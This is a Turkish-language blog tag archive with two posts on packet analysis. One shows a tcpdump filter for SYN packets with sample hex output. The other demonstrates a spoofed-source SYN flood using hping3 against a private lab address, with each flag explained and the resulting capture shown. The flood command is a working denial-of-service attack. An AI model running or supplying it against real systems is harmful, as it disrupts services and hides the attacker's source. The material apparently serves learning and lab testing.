Etiket arşivi: tcpdump

tcpdump2

tcpdump -s0 -vvv -XX "tcp" and \(port 80 and src host 192.168.2.253\) and 'tcp[13]==2'

komutu bize tcp bağlantılarının hedef portu 80 olan ve kaynak ip si 192.168.2.253 olan ve yeni bağlantı isteği gönderen (bayrağı syn (syn flag) paketleri ayrıntılı dökümünü verir. komutun çıktısı aşağıda ki gibidir.

tcpdump: listening on Internal
23:04:16.773463 192.168.2.102.2127 > host-91-93-100-7.teletektelekom.com.http: S [tcp sum ok] 1822753022:1822753022(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5180, len 48)
0x0000   4500 0030 143c 4000 7f06 6519 c0a8 0266        E..0.<@...e....f
0x0010   5b5d 6407 084f 0050 6ca5 00fe 0000 0000        []d..O.Pl.......
0x0020   7002 faf0 8f79 0000 0204 05b4 0101 0402        p....y..........
23:04:16.960148 192.168.2.102.2129 > 162-25.kokteyl.com.http: S [tcp sum ok] 4061068035:4061068035(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5314, len 48)
0x0000   4500 0030 14c2 4000 7f06 261f c0a8 0266        E..0..@...&....f
0x0010   5bbf a219 0851 0050 f20e fb03 0000 0000        [....Q.P........
0x0020   7002 faf0 d193 0000 0204 05b4 0101 0402        p...............
23:04:17.151208 192.168.2.102.2131 > ads-hl.noktamedya.com.tr.http: S [tcp sum ok] 2568001692:2568001692(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5339, len 48)
0x0000   4500 0030 14db 4000 7f06 e7cf c0a8 0266        E..0..@........f
0x0010   5e4b ddc3 0853 0050 9910 989c 0000 0000        ^K...S.P........
0x0020   7002 faf0 4ec1 0000 0204 05b4 0101 0402        p...N...........
23:04:17.160741 192.168.2.102.2133 > ads-hl.noktamedya.com.tr.http: S [tcp sum ok] 1476480589:1476480589(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5348, len 48)
0x0000   4500 0030 14e4 4000 7f06 e7c6 c0a8 0266        E..0..@........f
0x0010   5e4b ddc3 0855 0050 5801 4e4d 0000 0000        ^K...U.PX.NM....
0x0020   7002 faf0 da1d 0000 0204 05b4 0101 0402        p...............

hping ve flood


root@bt:~# hping3 -d 122 -S -w 64 -p 80 10.56.90.12 --flood --rand-source
using eth0, addr: 10.56.90.15, MTU: 1500
HPING 10.56.90.12 (eth0 10.56.90.12): S set, 40 headers + 120 data bytes

--- 10.56.90.12 hping statistic ---
100 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
-d 122:122 byte'lık data
-S:SIN bayrağı
-w 64:64 TTL 
-p 80: dst port 80
--rand-source: src ip ler random oluşturulsun.
--flood : flood mod kullan. 

flood modda bir kaç saniye içerisinde hedefe 1000’ler ce paket gönderimi yapılabilir. Yukarıda ki komutla 10.56.90.12 nolu makinaya her paket farklı kaynaklardan geliyor gibi SYN paketleri gönderdik. tcpdump çıktısı aşağıdadır.



root@bt:/etc/network# tcpdump dst host 10.56.90.12
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:47:17.600589 IP 209.122.151.139.2406 > 10.56.90.12.www: S 1436648546:1436648668(122) win 64
17:47:17.601995 IP 178.81.255.60.2407 > 10.56.90.12.www: S 1705955575:1705955697(122) win 64
17:47:17.602201 IP 19.206.43.55.2408 > 10.56.90.12.www: S 1562290490:1562290612(122) win 64
17:47:17.602374 IP 36.189.9.197.2409 > 10.56.90.12.www: S 604641588:604641710(122) win 64
17:47:17.602530 IP 196.0.180.214.2410 > 10.56.90.12.www: S 1803770982:1803771104(122) win 64
17:47:17.602720 IP AAnnecy-551-1-17-160.w92-153.abo.wanadoo.fr.2411 > 10.56.90.12.www: S 288343201:288343323(122) win 64
17:47:17.602887 IP 120.185.180.254.2412 > 10.56.90.12.www: S 813778207:813778329(122) win 64
17:47:17.603042 IP 23.140.235.139.2413 > 10.56.90.12.www: S 656869372:656869494(122) win 64
17:47:17.603208 IP 224.9.55.23.2414 > 10.56.90.12.www: S 1015093568:1015093690(122) win 64
17:47:17.603360 IP 180.71.183.204.2415 > 10.56.90.12.www: S 1877170202:1877170324(122) win 64
17:47:17.603561 IP 162.221.67.19.2416 > 10.56.90.12.www: S 1513053936:1513054058(122) win 64
17:47:17.603716 IP 197.0.209.215.2417 > 10.56.90.12.www: S 876153697:876153819(122) win 64
17:47:17.603856 IP 125.26.125.157.adsl.dynamic.totbb.net.2418 > 10.56.90.12.www: S 843277992:843278114(122) win 64
17:47:17.604010 IP h223s10a9n47.user.nortelnetworks.com.2419 > 10.56.90.12.www: S 1567951363:1567951485(122) win 64
17:47:17.604177 IP 216-229-69-16-empty.fidnet.com.2420 > 10.56.90.12.www: S 2132378618:2132378740(122) win 64
17:47:17.604331 IP 100.183.141.52.2421 > 10.56.90.12.www: S 404964666:404964788(122) win 64
17:47:17.604482 IP 211.170.169.93.2422 > 10.56.90.12.www: S 1346133522:1346133644(122) win 64
17:47:17.604635 IP 163.242.189.52.2423 > 10.56.90.12.www: S 1804076725:1804076847(122) win 64
17:47:17.604819 IP 140.37.131.254.2424 > 10.56.90.12.www: S 99362479:99362601(122) win 64
17:47:17.604976 IP 254.154.21.43.2425 > 10.56.90.12.www: S 1266537163:1266537285(122) win 64
17:47:17.605110 IP 127.255.160.209.2426 > 10.56.90.12.www: S 2003554614:2003554736(122) win 64
17:47:17.605261 IP 178.190.187.221.2427 > 10.56.90.12.www: S 537031363:537031485(122) win 64
17:47:17.605403 IP 252.17.81.20.2428 > 10.56.90.12.www: S 1366970421:1366970543(122) win 64
^C17:47:17.605577 IP 28.81.43.5.2429 > 10.56.90.12.www: S 849389274:849389396(122) win 64

24 packets captured
16315 packets received by filter
16036 packets dropped by kernel